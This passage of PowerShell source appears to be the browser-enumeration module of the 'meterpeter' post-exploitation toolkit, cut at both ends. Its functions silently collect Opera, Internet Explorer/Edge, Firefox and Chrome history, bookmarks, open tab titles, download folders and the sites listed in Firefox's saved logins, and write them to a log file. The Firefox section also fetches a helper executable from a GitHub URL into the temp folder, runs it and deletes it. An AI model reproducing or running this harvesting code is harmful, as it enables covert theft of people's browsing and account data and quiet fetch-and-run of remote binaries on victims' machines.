\"$ParsingData\" >> $LogFilePath\\BrowserEnum.log\r\n }\r\n Else\r\n {\r\n $ParsingData = \"HomePage : {fail to retrieve Browser HomePage}\"\r\n echo \"$ParsingData\" >> $LogFilePath\\BrowserEnum.log\r\n }\r\n\r\n\r\n ## Get Opera Last Active Tab windowsTitle\r\n echo \"`nActive Browser Tab\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"------------------\" >> $LogFilePath\\BrowserEnum.log\r\n $checkProcess = Get-Process Opera -EA SilentlyContinue\r\n If(-not($checkProcess))\r\n {\r\n echo \"{requires Opera process running}\" >> $LogFilePath\\BrowserEnum.log\r\n }\r\n Else\r\n {\r\n $StoreData = (Get-Process Opera).MainWindowTitle\r\n $ParseData = $StoreData | where {$_ -ne \"\"}\r\n $MyPSObject = $ParseData -replace '- Opera',''\r\n echo \"$MyPSObject\" >> $LogFilePath\\BrowserEnum.log\r\n }\r\n\r\n #Get browser bookmarks\r\n echo \"`nOpera Bookmarks\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"---------------\" >> $LogFilePath\\BrowserEnum.log\r\n $GETbooks = (Get-ChildItem \"$Env:APPDATA\\Opera Software\\Opera*\" -Recurse -Force -Filter \"Bookmarks\").FullName\r\n If($GETbooks)\r\n {\r\n $JsPrefs = Get-content \"$GETbooks\" -ErrorAction SilentlyContinue|Select-String \"`\"url`\":\"\r\n $ParsingData = $JsPrefs -replace '\"url\":','' -replace '\"','' -replace ' ',''\r\n echo $ParsingData >> $LogFilePath\\BrowserEnum.log \r\n }\r\n Else\r\n {\r\n $ParsingData = \"{Could not find any Bookmarks}\"\r\n echo \"$ParsingData\" >> $LogFilePath\\BrowserEnum.log \r\n }\r\n \r\n }\r\n Else\r\n {\r\n echo \"{Could not find any Browser Info}\" >> $LogFilePath\\BrowserEnum.log \r\n }\r\n\r\n}\r\n\r\n\r\nfunction IE_Dump {\r\n ## Retrieve IE Browser Information\r\n echo \"`n`nIE Browser\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"----------\" >> $LogFilePath\\BrowserEnum.log\r\n ## New MicrosoftEdge Update have changed the binary name to 'msedge' ..\r\n $CheckVersion = (Get-ItemProperty -Path \"HKLM:\\SOFTWARE\\Microsoft\\Internet Explorer\" -ErrorAction SilentlyContinue).version\r\n If($CheckVersion -lt '9.11.18362.0'){$ProcessName = \"MicrosoftEdge\"}else{$ProcessName = \"msedge\"}\r\n $IEVersion = Get-ItemProperty -Path \"HKLM:\\SOFTWARE\\Microsoft\\Internet Explorer\" -Name 'Version' -ErrorAction SilentlyContinue|Select-Object 'Version'\r\n If(-not($IEVersion) -or $IEVersion -eq $null){\r\n echo \"{Could not find any Browser Info}\" >> $LogFilePath\\BrowserEnum.log\r\n }else{\r\n $IEData = $IEVersion -replace '@{Version=','Version : ' -replace '}',''\r\n $RegPrefs = Get-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Internet Explorer\\Main\\\" -Name 'start page'|Select-Object 'Start Page'\r\n $ParsingData = $RegPrefs -replace '@{Start Page=','HomePage : ' -replace '}',''\r\n $LocalPage = Get-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Internet Explorer\\Main\\\" -Name 'Search Page'|Select-Object 'Search Page'\r\n $ParsingLocal = $LocalPage -replace '@{Search Page=','SearchPage : ' -replace '}',''\r\n $IntSet = Get-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\internet settings\" -Name 'User Agent'|Select-Object 'User Agent'\r\n $ParsingIntSet = $IntSet -replace '@{User Agent=','UserAgent : ' -replace '}',''\r\n $DownloadDir = Get-ItemProperty 'HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders' -Name \"{374DE290-123F-4565-9164-39C4925E467B}\"|findstr /I /C:\"Downloads\"\r\n $ParseDownload = $DownloadDir -replace '{374DE290-123F-4565-9164-39C4925E467B} :','Downloads :'\r\n $logfilefolder = (Get-ItemProperty \"HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\").Cache\r\n $dataparse = \"INetCache : \"+\"$logfilefolder\"\r\n\r\n $IETestings = (Get-Process -Name \"$ProcessName\" -EA SilentlyContinue).Responding\r\n If(-not($IETestings) -or $IETestings -eq $null){\r\n $Status = \"Status : Stoped\"\r\n $PSID = \"Process PID : {requires $ProcessName process running}\"\r\n $FinalOut = \"StartTime : {requires $ProcessName process running}\"\r\n }else{\r\n $Status = \"Status : Active\"\r\n $BrowserStartTime = (Get-Process -Name \"$ProcessName\").StartTime.ToString()\r\n $StartTime = $BrowserStartTime[0];$FinalOut = \"StartTime : $StartTime\"\r\n $ProcessPID = (Get-Process -Name \"$ProcessName\"|Select -Last 1).Id.ToString()\r\n $PSID = \"Process PID : $ProcessPID\"\r\n }\r\n\r\n ## Writting LogFile to the selected path in: { $param2 var }\r\n echo \"$Status\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"$IEData\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"$ParseDownload\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"$ParsingData\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"$ParsingLocal\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"$dataparse\" >> $LogFilePath\\BrowserEnum.log\r\n }\r\n\r\n <#\r\n $BinaryPathName = Get-Process $ProcessName -ErrorAction SilentlyContinue\r\n If(-not($BinaryPathName) -or $BinaryPathName -eq $null){\r\n echo \"BinaryPath : {requires $ProcessName process running}\" >> $LogFilePath\\BrowserEnum.log\r\n }else{\r\n $BinaryPathName = (Get-Process -Name $ProcessName).Path.ToString()\r\n $parseData = $BinaryPathName[0]\r\n echo \"BinaryPath : $parseData\" >> $LogFilePath\\BrowserEnum.log\r\n }\r\n\r\n ## leak From previous Functions { StartTime|PID }\r\n echo \"$FinalOut\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"$PSID\" >> $LogFilePath\\BrowserEnum.log\r\n\r\n #>\r\n ## leak IE Last Active Tab windowsTitle\r\n echo \"`nActive Browser Tab\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"------------------\" >> $LogFilePath\\BrowserEnum.log\r\n $checkProcess = Get-Process $ProcessName -ErrorAction SilentlyContinue\r\n If(-not($checkProcess) -or $checkProcess -eq $null){\r\n echo \"{requires $ProcessName process running}`n\" >> $LogFilePath\\BrowserEnum.log\r\n }else{\r\n $StoreData = Get-Process $ProcessName | Select -ExpandProperty MainWindowTitle\r\n $ParseData = $StoreData | where {$_ -ne \"\"}\r\n $MyPSObject = $ParseData -replace '- Microsoft? Edge',''\r\n echo \"$MyPSObject`n\" >> $LogFilePath\\BrowserEnum.log\r\n }\r\n\r\n ## Retrieve IE history URLs\r\n # \"$env:LOCALAPPDATA\\Microsoft\\Edge\\User Data\\Default\\History\"\r\n # Get-ItemProperty -Path \"HKCU:\\SOFTWARE\\Microsoft\\Internet Explorer\\TypedURLs\"\r\n echo \"`nIE History\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"----------\" >> $LogFilePath\\BrowserEnum.log\r\n If(-not(Test-Path -Path \"$env:LOCALAPPDATA\\Microsoft\\Edge\\User Data\\Default\\History\")){\r\n ## Retrieve History from ie`xplorer if not found MsEdge binary installation ..\r\n $Finaltest = Get-ItemProperty -Path \"HKCU:\\SOFTWARE\\Microsoft\\Internet Explorer\\TypedURLs\" -ErrorAction SilentlyContinue\r\n If(-not($Finaltest) -or $Finaltest -eq $null){\r\n echo \"{Could not find any History}\" >> $LogFilePath\\BrowserEnum.log\r\n }else{\r\n Get-ItemProperty -Path \"HKCU:\\SOFTWARE\\Microsoft\\Internet Explorer\\TypedURLs\"|findstr /B /I \"url\" >> $LogFilePath\\BrowserEnum.log\r\n }\r\n }else{\r\n $Regex = '([a-zA-Z]{3,})://([\\w-]+\\.)+[\\w-]+(/[\\w- ./?%&=]*)*?'\r\n $MsEdgeHistory = \"$env:LOCALAPPDATA\\Microsoft\\Edge\\User Data\\Default\\History\"\r\n Get-Content \"$MsEdgeHistory\"|Select-String -Pattern $Regex -AllMatches | % { $_.Matches } | % { $_.Value } | Sort-Object -Unique >> $LogFilePath\\BrowserEnum.log\r\n }\r\n\r\n ## Retrieve IE Favorites\r\n echo \"`nIE Favorites\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"------------\" >> $LogFilePath\\BrowserEnum.log\r\n If(-not(Test-Path \"$env:LOCALAPPDATA\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\Favorites\\*\")){\r\n If(-not(Test-Path \"$env:LOCALAPPDATA\\Microsoft\\Edge\\User Data\\Default\\Last Tabs\")){\r\n echo \"{Could not find any Favorites}\" >> $LogFilePath\\BrowserEnum.log\r\n }else{\r\n $LocalDirPath = \"$env:LOCALAPPDATA\\Microsoft\\Edge\\User Data\\Default\\Last Tabs\"\r\n $ParseFileData = Get-Content \"$LocalDirPath\"|findstr /I /C:\"http\" /I /C:\"https\"\r\n $DumpFileData = $ParseFileData -replace '[^a-zA-Z/:. ]',''\r\n ForEach ($Token in $DumpFileData){\r\n $Token = $Token -replace ' ',''\r\n echo \"`n\" $Token >> $LogFilePath\\BrowserEnum.log\r\n } \r\n }\r\n\r\n }else{\r\n\r\n $LocalDirPath = \"$env:LOCALAPPDATA\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\Favorites\\*\"\r\n $DumpFileData = Get-Content \"$LocalDirPath\" -Raw|findstr /I /C:\"http\" /C:\"https\" # Test.txt and test2.txt (test Files) ..\r\n ForEach ($Token in $DumpFileData){\r\n $Token = $Token -replace ' ',''\r\n echo $Token >> $LogFilePath\\BrowserEnum.log\r\n }\r\n }\r\n\r\n ## Retrieve IE Bookmarks\r\n echo \"`nIE Bookmarks\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"------------\" >> $LogFilePath\\BrowserEnum.log\r\n If(-not(Test-Path \"$env:LOCALAPPDATA\\Microsoft\\Edge\\User Data\\Default\\Bookmarks\")){\r\n ## Leaking ie`xplore\r\n $URLs = Get-ChildItem -Path \"$Env:SYSTEMDRIVE\\Users\\\" -Filter \"*.url\" -Recurse -ErrorAction SilentlyContinue\r\n ForEach ($URL in $URLs){\r\n if ($URL.FullName -match 'Favorites'){\r\n $User = $URL.FullName.split('\\')[2]\r\n Get-Content -Path $URL.FullName|ForEach-Object {\r\n try {\r\n if ($_.StartsWith('URL')){\r\n ## parse the .url body to extract the actual bookmark location\r\n $URL = $_.Substring($_.IndexOf('=') + 1)\r\n if($URL -match $Search){\r\n echo \"$URL\" >> $LogFilePath\\BrowserEnum.log\r\n }\r\n }\r\n }\r\n catch {\r\n echo \"Error parsing url: $_\" >> $LogFilePath\\BrowserEnum.log\r\n }\r\n }\r\n }\r\n }\r\n\r\n }else{\r\n ## Leaking msedge \r\n $LocalDirPath = \"$env:LOCALAPPDATA\\Microsoft\\Edge\\User Data\\Default\\Bookmarks\"\r\n $DumpFileData = Get-Content \"$LocalDirPath\" -Raw|findstr /I /C:\"http\" /C:\"https\"\r\n ForEach ($Token in $DumpFileData){\r\n $Token = $Token -replace '\"','' -replace 'url:','' -replace ' ',''\r\n echo $Token >> $LogFilePath\\BrowserEnum.log\r\n }\r\n }\r\n}\r\n\r\n\r\nfunction FIREFOX {\r\n ## Retrieve FireFox Browser Information\r\n echo \"`n`nFireFox Browser\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"---------------\" >> $LogFilePath\\BrowserEnum.log\r\n\r\n ## Set the Location of firefox prefs.js file\r\n If(Test-Path \"$Env:APPDATA\\Mozilla\\Firefox\\Profiles\"){\r\n\r\n ## Check browser: { active|StartTime|PID } Settings\r\n $FFTestings = (Get-Process Firefox -ErrorAction SilentlyContinue).Responding\r\n If($FFTestings -eq $True){\r\n $Status = \"Status : Active\"\r\n $BsT = Get-Process Firefox|Select -ExpandProperty StartTime\r\n $StartTime = $BsT[0];$FinalOut = \"StartTime : $StartTime\"\r\n echo \"$Status\" >> $LogFilePath\\BrowserEnum.log\r\n }else{\r\n $Status = \"Status : Stoped\"\r\n $PSID = \"Process PID : {requires Firefox process running}\"\r\n $FinalOut = \"StartTime : {requires Firefox process running}\"\r\n echo \"$Status\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"$PSID\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"$FinalOut\" >> $LogFilePath\\BrowserEnum.log\r\n }\r\n\r\n ## Get Browser Version { 76.0.11 }\r\n If(-not(Test-Path -Path \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\"))\r\n {\r\n $ParsingData = \"{null}\"\r\n }\r\n Else\r\n {\r\n If(-not(Test-Path \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default\\prefs.js\"))\r\n {\r\n If(-not(Test-Path \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default-release\\prefs.js\"))\r\n {\r\n $ParsingData = \"{null}\"\r\n }\r\n Else\r\n {\r\n $stupidTrick = $True\r\n $FirefoxProfile = \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default-release\\prefs.js\"\r\n $JsPrefs = Get-content $FirefoxProfile|Select-String \"extensions.lastPlatformVersion\"\r\n $ParsingData = $JsPrefs -replace 'user_pref\\(','' -replace '\\\"','' -replace ',','' -replace '\\);','' -replace 'extensions.lastPlatformVersion','' -replace ' ',''\r\n }\r\n }\r\n Else\r\n {\r\n $FirefoxProfile = \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default\\prefs.js\"\r\n $JsPrefs = Get-content $FirefoxProfile|Select-String \"extensions.lastPlatformVersion\"\r\n $ParsingData = $JsPrefs -replace 'user_pref\\(','' -replace '\\\"','' -replace ',','' -replace '\\);','' -replace 'extensions.lastPlatformVersion','' -replace ' ',''\r\n }\r\n }\r\n #add data to logfile\r\n echo \"Version : $ParsingData\" >> $LogFilePath\\BrowserEnum.log\r\n\r\n\r\n ## Get brownser startup page { https://www.google.pt }\r\n $JsPrefs = Get-content \"$FirefoxProfile\" -ErrorAction SilentlyContinue|Select-String \"browser.startup.homepage\"\r\n If($stupidTrick -eq $True)\r\n {\r\n $ParseData = $JsPrefs -split(';');$Strip = $ParseData[0]\r\n $ParsingData = $Strip -replace 'user_pref\\(','' -replace '\\\"','' -replace ',',':' -replace '\\)','' -replace 'browser.startup.homepage',''\r\n echo \"HomePage $ParsingData\" >> $LogFilePath\\BrowserEnum.log\r\n }\r\n Else\r\n {\r\n If($ParsingData -iMatch '{null}')\r\n {\r\n $ParsingData = \" {null}\"\r\n }\r\n Else\r\n {\r\n $ParsingData = $JsPrefs[0] -replace 'user_pref\\(','' -replace '\\\"','' -replace ',',':' -replace '\\);','' -replace 'browser.startup.homepage',''\r\n }\r\n echo \"HomePage $ParsingData\" >> $LogFilePath\\BrowserEnum.log\r\n\r\n }\r\n\r\n ## Get browser.download.dir { C:\\Users\\pedro\\Desktop }\r\n $JsPrefs = Get-Content \"$FirefoxProfile\" -ErrorAction SilentlyContinue|Select-String \"browser.download.dir\";\r\n If(-not($JsPrefs) -or $JsPrefs -eq $null){\r\n ## Test with browser.download.lastDir\r\n $JsPrefs = Get-Content \"$FirefoxProfile\" -ErrorAction SilentlyContinue|Select-String \"browser.download.lastDir\"\r\n If(-not($JsPrefs) -or $JsPrefs -eq $null){\r\n echo \"Downloads : {null}\" >> $LogFilePath\\BrowserEnum.log\r\n }else{\r\n $ParsingData = $JsPrefs -replace 'user_pref\\(','' -replace '\\\"','' -replace ',',':' -replace '\\);','' -replace 'browser.download.lastDir','Downloads '\r\n If($ParsingData -match '\\\\\\\\'){$ParsingData = $ParsingData -replace '\\\\\\\\','\\'}\r\n echo \"$ParsingData\" >> $LogFilePath\\BrowserEnum.log \r\n }\r\n }else{\r\n $ParsingData = $JsPrefs -replace 'user_pref\\(','' -replace '\\\"','' -replace ',',':' -replace '\\);','' -replace 'browser.download.dir','Downloads '\r\n If($ParsingData -match '\\\\\\\\'){$ParsingData = $ParsingData -replace '\\\\\\\\','\\'}\r\n echo \"$ParsingData\" >> $LogFilePath\\BrowserEnum.log\r\n }\r\n }else{\r\n echo \"{Could not find any Browser Info}\" >> $LogFilePath\\BrowserEnum.log\r\n }\r\n\r\n ## Get Firefox.exe binary path\r\n $BinaryPath = Get-Process firefox -ErrorAction SilentlyContinue\r\n If(-not($BinaryPath) -or $BinaryPath -eq $null){\r\n echo \"BinaryPath : {requires firefox process running}\" >> $LogFilePath\\BrowserEnum.log\r\n }else{\r\n $BinaryPath = Get-Process firefox|Select -ExpandProperty Path\r\n $parseData = $BinaryPath[0]\r\n echo \"BinaryPath : $parseData\" >> $LogFilePath\\BrowserEnum.log\r\n }\r\n ## leak From previous Functions { StartTime|PID }\r\n echo \"$FinalOut\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"$PSID\" >> $LogFilePath\\BrowserEnum.log\r\n\r\n ## Get Firefox Last Active Tab windowsTitle\r\n echo \"`nActive Browser Tab\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"------------------\" >> $LogFilePath\\BrowserEnum.log\r\n $checkProcess = Get-Process firefox -ErrorAction SilentlyContinue\r\n If(-not($checkProcess)){\r\n echo \"{requires firefox process running}`n\" >> $LogFilePath\\BrowserEnum.log\r\n }else{\r\n $StoreData = Get-Process firefox|Select -ExpandProperty MainWindowTitle\r\n $ParseData = $StoreData | where {$_ -ne \"\"}\r\n $MyPSObject = $ParseData -replace '- Mozilla Firefox',''\r\n echo \"$MyPSObject`n\" >> $LogFilePath\\BrowserEnum.log\r\n }\r\n\r\n ## leak FIREFOX HISTORY URLs\r\n # Source: https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/master/Get-BrowserData.ps1\r\n echo \"`nFireFox History\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"---------------\" >> $LogFilePath\\BrowserEnum.log\r\n If(Test-Path \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default-release\"){\r\n $Profiles = \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default-release\"\r\n $Regex = '([a-zA-Z]{3,})://([\\w-]+\\.)+[\\w-]+(/[\\w- ./?%&=]*)*?'\r\n Get-Content $Profiles\\places.sqlite -ErrorAction SilentlyContinue|Select-String -Pattern $Regex -AllMatches | % { $_.Matches } | % { $_.Value } | Sort-Object -Unique | % {\r\n $Value = New-Object -TypeName PSObject -Property @{\r\n FireFoxHistoryURL = $_\r\n }\r\n if ($Value -match $Search) {\r\n $ParsingData = $Value -replace '@{FireFoxHistoryURL=','' -replace '}',''\r\n echo \"$ParsingData\" >> $LogFilePath\\BrowserEnum.log\r\n }\r\n }\r\n\r\n }else{\r\n\r\n If(-not(Test-Path \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default\")){\r\n echo \"{Could not find any History}\" >> $LogFilePath\\BrowserEnum.log \r\n }else{\r\n $Profiles = \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default\"\r\n $Regex = '([a-zA-Z]{3,})://([\\w-]+\\.)+[\\w-]+(/[\\w- ./?%&=]*)*?'\r\n Get-Content $Profiles\\places.sqlite -ErrorAction SilentlyContinue|Select-String -Pattern $Regex -AllMatches | % { $_.Matches } | % { $_.Value } | Sort-Object -Unique | % {\r\n $Value = New-Object -TypeName PSObject -Property @{\r\n FireFoxHistoryURL = $_\r\n }\r\n if ($Value -match $Search) {\r\n $ParsingData = $Value -replace '@{FireFoxHistoryURL=','' -replace '}',''\r\n echo \"$ParsingData\" >> $LogFilePath\\BrowserEnum.log\r\n } \r\n }\r\n }\r\n }\r\n\r\n ## Retrieve FireFox bookmarks\r\n echo \"`nFirefox Bookmarks\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"-----------------\" >> $LogFilePath\\BrowserEnum.log\r\n $IPATH = pwd;$AlternativeDir = $False\r\n If(-not(Test-Path \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default-release\")){\r\n $Bookmarks_Path = \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default\\bookmarkbackups\\*.jsonlz4\" \r\n }else{\r\n $AlternativeDir = $True\r\n $Bookmarks_Path = \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default-release\\bookmarkbackups\\*.jsonlz4\" \r\n }\r\n\r\n If(-not(Test-Path -Path \"$Bookmarks_Path\")) {\r\n echo \"{Could not find any Bookmarks}\" >> $LogFilePath\\BrowserEnum.log\r\n }else{\r\n If($AlternativeDir -eq $True){\r\n ## Store last bookmark file into { $Final } local var\r\n cd \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default-release\\bookmarkbackups\\\"\r\n $StorePath = dir \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default-release\\bookmarkbackups\\*\"\r\n $Final = $StorePath|Select-Object -ExpandProperty name|Select -Last 1\r\n ## Copy .Jsonlz4 file to $env:tmp directory\r\n Copy-Item -Path \"$Final\" -Destination \"$env:tmp\\output.jsonlz4\" -Force\r\n }else{\r\n ## Store last bookmark file into { $Final } local var\r\n cd \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default\\bookmarkbackups\\\"\r\n $StorePath = dir \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default\\bookmarkbackups\\*\"\r\n $Final = $StorePath|Select-Object -ExpandProperty name|Select -Last 1\r\n ## Copy .Jsonlz4 file to $env:tmp directory\r\n Copy-Item -Path \"$Final\" -Destination \"$env:tmp\\output.jsonlz4\" -Force\r\n }\r\n \r\n If(-not(Test-Path \"$Env:TMP\\mozlz4-win32.exe\")){\r\n\r\n ## Download mozlz4-win32.exe from meterpeter github repo\r\n Start-BitsTransfer -priority foreground -Source https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/mozlz4-win32.exe -Destination $Env:TMP\\mozlz4-win32.exe -ErrorAction SilentlyContinue|Out-Null \r\n\r\n cd $Env:TMP\r\n ## Convert from jsonlz4 to json\r\n .\\mozlz4-win32.exe --extract output.jsonlz4 output.json\r\n $DumpFileData = Get-Content \"$env:tmp\\output.json\" -Raw\r\n $SplitString = $DumpFileData.split(',')\r\n $findUri = $SplitString|findstr /I /C:\"uri\"\r\n $Deliconuri = $findUri|findstr /V /C:\"iconuri\"\r\n $ParsingData = $Deliconuri -replace '\"','' -replace 'uri:','' -replace '}','' -replace ']',''\r\n echo $ParsingData >> $LogFilePath\\BrowserEnum.log\r\n Remove-Item -Path \"$env:tmp\\output.json\" -Force -ErrorAction SilentlyContinue\r\n Remove-Item -Path \"$env:tmp\\output.jsonlz4\" -Force -ErrorAction SilentlyContinue\r\n\r\n <#\r\n .SYNOPSIS\r\n mozlz4-win32.exe Firefox Fail dependencie bypass\r\n .DESCRIPTION\r\n I cant use 'ConvertFrom-Json' cmdlet because it gives 'primitive\r\n JSON invalid error' parsing .jsonlz4 files to TEXT|CSV format ..\r\n #>\r\n\r\n ## [ deprecated function ]\r\n # $Json = Get-Content \"$Bookmarks_Path\" -Raw\r\n # $Regex = $Json -replace '[^a-zA-Z0-9/:. ]','' # Replace all chars that does NOT match the Regex\r\n # ForEach ($Key in $Regex){\r\n # echo \"`n\" $Key >> $LogFilePath\\BrowserEnum.log\r\n # }\r\n\r\n }Else{\r\n\r\n cd $Env:TMP\r\n ## Convert from jsonlz4 to json\r\n .\\mozlz4-win32.exe --extract output.jsonlz4 output.json\r\n $DumpFileData = Get-Content \"$env:tmp\\output.json\" -Raw\r\n $SplitString = $DumpFileData.split(',')\r\n $findUri = $SplitString|findstr /I /C:\"uri\"\r\n $Deliconuri = $findUri|findstr /V /C:\"iconuri\"\r\n $ParsingData = $Deliconuri -replace '\"','' -replace 'uri:','' -replace '}','' -replace ']',''\r\n echo $ParsingData >> $LogFilePath\\BrowserEnum.log\r\n Remove-Item -Path \"$env:tmp\\output.json\" -Force -ErrorAction SilentlyContinue\r\n Remove-Item -Path \"$env:tmp\\output.jsonlz4\" -Force -ErrorAction SilentlyContinue\r\n\r\n }\r\n }\r\n cd $IPATH\r\n If(Test-Path \"$Env:TMP\\output.jsonlz4\"){Remove-Item -Path \"$Env:TMP\\output.jsonlz4\" -Force}\r\n If(Test-Path \"$Env:TMP\\mozlz4-win32.exe\"){Remove-Item -Path \"$Env:TMP\\mozlz4-win32.exe\" -Force}\r\n\r\n ## Retrieve Firefox logins\r\n echo \"`nEnumerating LogIns\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"------------------\" >> $LogFilePath\\BrowserEnum.log\r\n If(-not(Test-Path \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default\\logins.json\"))\r\n {\r\n If(-not(Test-Path \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default-release\\logins.json\"))\r\n {\r\n echo \"{None URL's found}\" >> $LogFilePath\\BrowserEnum.log\r\n }else{\r\n $ReadData = Get-Content \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default-release\\logins.json\" \r\n $SplitData = $ReadData -split(',')\r\n $ParseData = $SplitData|findstr /I /C:\"http\" /I /C:\"https\"|findstr /V /C:\"httpRealm\" /V /C:\"formSubmitURL\"\r\n $Json = $ParseData -replace '\":','' -replace '\"','' -replace 'hostname',''\r\n echo $Json >> $LogFilePath\\BrowserEnum.log\r\n }\r\n }else{\r\n $ReadData = Get-Content \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*.default\\logins.json\" \r\n $SplitData = $ReadData -split(',')\r\n $ParseData = $SplitData|findstr /I /C:\"http\" /I /C:\"https\"|findstr /V /C:\"httpRealm\" /V /C:\"formSubmitURL\"\r\n $Json = $ParseData -replace '\":','' -replace '\"','' -replace 'hostname',''\r\n echo $Json >> $LogFilePath\\BrowserEnum.log\r\n }\r\n}\r\n\r\n\r\nfunction CHROME {\r\n ## Retrieve Google Chrome Browser Information\r\n echo \"`n`nChrome Browser\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"--------------\" >> $LogFilePath\\BrowserEnum.log\r\n $Chrome_App = Get-ItemProperty 'HKCU:\\Software\\Google\\Chrome\\BLBeacon' -ErrorAction SilentlyContinue\r\n If(-not($Chrome_App) -or $Chrome_App -eq $null){\r\n echo \"{Could not find any Browser Info}\" >> $LogFilePath\\BrowserEnum.log\r\n }else{\r\n ## Test if browser its active \r\n $Preferencies_Path = get-content \"$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Preferences\" -ErrorAction SilentlyContinue\r\n $CHTestings = (Get-Process Chrome -ErrorAction SilentlyContinue).Responding\r\n If($CHTestings -eq $True){\r\n $Status = \"Status : Active\"\r\n ## Get Browser startTime\r\n $BsT = Get-Process Chrome|Select -ExpandProperty StartTime\r\n $StartTime = $BsT[0];$FinalOut = \"StartTime : $StartTime\"\r\n $SSID = get-process Chrome|Select -Last 1|Select-Object -Expandproperty Id\r\n $PSID = \"Process PID : $SSID\"\r\n }else{\r\n $Status = \"Status : Stoped\"\r\n $PSID = \"Process PID : {requires Chrome process running}\"\r\n $FinalOut = \"StartTime : {requires Chrome process running}\"\r\n }\r\n echo \"$Status\" >> $LogFilePath\\BrowserEnum.log\r\n\r\n ## Retrieve Browser accept languages\r\n If($Preferencies_Path){\r\n $Parse_String = $Preferencies_Path.split(\",\")\r\n $Search_Lang = $Parse_String|select-string \"accept_languages\"\r\n $Parse_Dump = $Search_Lang -replace '\"','' -replace 'intl:{','' -replace ':',' : ' -replace 'accept_languages','Languages'\r\n If(-not($Parse_Dump) -or $Parse_Dump -eq $null){\r\n echo \"Languages : {null}\" >> $LogFilePath\\BrowserEnum.log\r\n }else{\r\n echo \"$Parse_Dump\" >> $LogFilePath\\BrowserEnum.log\r\n }\r\n }\r\n\r\n ## Retrieve Browser Version\r\n $GCVersionInfo = (Get-ItemProperty 'HKCU:\\Software\\Google\\Chrome\\BLBeacon').Version\r\n echo \"Version : $GCVersionInfo\" >> $LogFilePath\\BrowserEnum.log\r\n\r\n ## Retrieve Download Folder (default_directory) Settings\r\n If($Preferencies_Path){\r\n $Parse_String = $Preferencies_Path.split(\",\")\r\n $Download_Dir = $Parse_String|select-string \"savefile\"\r\n If(-not($Download_Dir) -or $Download_Dir -eq $null){\r\n echo \"Downloads : $env:userprofile\\Downloads\" >> $LogFilePath\\BrowserEnum.log\r\n }else{\r\n $Parse_Dump = $Download_Dir -replace '\"','' -replace '{','' -replace '}','' -replace 'default_directory:','' -replace 'savefile:','Downloads : '\r\n If($Parse_Dump -match '\\\\\\\\'){$Parse_Dump = $Parse_Dump -replace '\\\\\\\\','\\'}\r\n echo \"$Parse_Dump\" >> $LogFilePath\\BrowserEnum.log\r\n }\r\n }\r\n\r\n ## leak Chrome.exe binary path\r\n $BinaryPath = Get-Process chrome -ErrorAction SilentlyContinue\r\n If(-not($BinaryPath) -or $BinaryPath -eq $null){\r\n echo \"BinaryPath : {requires chrome process running}\" >> $LogFilePath\\BrowserEnum.log\r\n }else{\r\n $BinaryPath = Get-Process chrome|Select -ExpandProperty Path\r\n $parseData = $BinaryPath[0]\r\n echo \"BinaryPath : $parseData\" >> $LogFilePath\\BrowserEnum.log\r\n }\r\n echo \"$FinalOut\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"$PSID\" >> $LogFilePath\\BrowserEnum.log\r\n\r\n ## leak Chrome Last Active Tab windowsTitle\r\n echo \"`nActive Browser Tab\" >> $LogFilePath\\BrowserEnum.log\r\n echo \"------------------\" >> $LogFilePath\\BrowserEnum.log\r\n $checkTitle = Get-Process chrome -ErrorAction SilentlyContinue\r\n If(-not($checkTitle)){\r\n echo \"{requires chrome process running}`n\" >> $LogFilePath\\BrowserEnum.log\r\n 